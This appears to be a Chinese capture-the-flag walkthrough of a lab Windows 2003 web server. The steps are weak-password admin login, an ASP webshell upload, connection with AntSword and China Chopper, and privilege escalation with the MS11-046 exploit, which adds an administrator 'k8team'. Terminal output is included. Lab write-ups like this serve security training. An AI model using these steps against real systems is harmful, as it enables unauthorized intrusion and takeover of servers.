第二个靶机

发表于 | 分类于 | 阅读次数:
本文字数: 4.3k | 阅读时长 ≈ 11 分钟

1.打开网站192.168.1.241,可以进入,则靶机配置正确;

2.浏览网页,打开浏览器开发者模式,搜索即可得两个flag:

flag1

3.通过御剑扫描该网站,也可以发现192.168.1.241/admin,即为该网站的后台管理接口;以及192.168.1.241/www.zip,即为该网站后台数据的压缩包。

御剑

4.下载该压缩包,发现压缩包内有flag.html网页。打开即可得到flag:

flag2

5.打开后台管理界面,尝试admin/123456或者test/123456登陆,登陆成功(可以通过burp破解密码);

6.浏览发现,后台可以上传文件,尝试后发现只能上传gif、jpg、bmp、png、swf、doc、rar、asp

文件上传

7.则上传asp的一句话木马,上传成功,并得到文件的路径为UploadFiles/20191125213818226.asp

8.使用中国蚁剑工具,通过添加数据连接至该靶机系统:

中国蚁剑

9.通过查看该网站的系统文件,在C盘下有flag.txt文件夹,即可得flag;

flag3

10.通过中国蚁剑的虚拟终端,执行whoami发现仅仅是nt authority\network service权限 ,则需要提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
C:\www\UploadFiles> whoami
nt authority\network service
c:\windows\system32\inetsrv> systeminfo
主机名:           HA_WEB2
OS 名称:          Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本:          5.2.3790 Service Pack 2 Build 3790
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Uniprocessor Free
注册的所有人:     Thinkpad
注册的组织:       
产品 ID:          69813-640-9722366-45823
初始安装日期:     2016-10-24, 8:57:06
系统启动时间:     0 天 1 小时 6 分 29 秒
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         X86-based PC
处理器:           安装了 1 个处理器。
                  [01]: x86 Family 6 Model 158 Stepping 9 GenuineIntel ~2499 Mhz
BIOS 版本:        INTEL  - 6040000
Windows 目录:     C:\WINDOWS
系统目录:         C:\WINDOWS\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     1,023 MB
可用的物理内存:   790 MB
页面文件: 最大值: 1,510 MB
页面文件: 可用:   1,371 MB
页面文件: 使用中: 139 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 1 个修补程序。
                  [01]: Q147222
网卡:             暂缺
c:\windows\system32\inetsrv> netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1272
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       720
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       436
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1848
  TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING       1272
  TCP    192.168.1.241:80       192.168.1.1:6481       TIME_WAIT       0
  TCP    192.168.1.241:80       192.168.1.1:6482       TIME_WAIT       0
  TCP    192.168.1.241:80       192.168.1.1:6483       TIME_WAIT       0
  TCP    192.168.1.241:80       192.168.1.1:6485       TIME_WAIT       0
  TCP    192.168.1.241:80       192.168.1.1:6487       ESTABLISHED     4
  TCP    192.168.1.241:139      0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    436
  UDP    0.0.0.0:1026           *:*                                    780
  UDP    0.0.0.0:4500           *:*                                    436
  UDP    127.0.0.1:123          *:*                                    828
  UDP    127.0.0.1:1027         *:*                                    828
  UDP    192.168.1.241:123      *:*                                    828
  UDP    192.168.1.241:137      *:*                                    4
  UDP    192.168.1.241:138      *:*                                    4

11.发现开启了3389端口,则可以通过github上的ms11-046的exp( 包含MS11_46_k8.exe和ms11-046.exe两个程序 )。

12.上传这两个可执行文件,发现失败,则采用中国菜刀连接:

中国菜刀

再次上传文件:

上传文件2

13.通过虚拟终端运行ma11-016 Exploit程序发现成功添加用户:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\WINDOWS\system32> cd..
C:\WINDOWS> cd..
C:\> cd c:\exp
C:\EXP> MS11_46_k8.exe
[>] ms11-046 Exploit
[*] Token system command
[*] command add user k8team k8team
[*] User has been successfully added
[*] Add to Administrators success
C:\EXP> net user
\\HA_WEB2 的用户帐户
-------------------------------------------------------------------------------
admin                    Administrator            Guest                    
IUSR_THINKPAD-AC1A79     IWAM_THINKPAD-AC1A79     k8team                   
SUPPORT_388945a0

14.则通过远程终端连接,用户名密码均为k8team,进入后执行第二个exp程序ms11-046.exe,再次执行whoami查看权限:

ms11

此时可以看到已经是system权限。

15.通过查找该计算机上的文件得到flag:

flag4

0%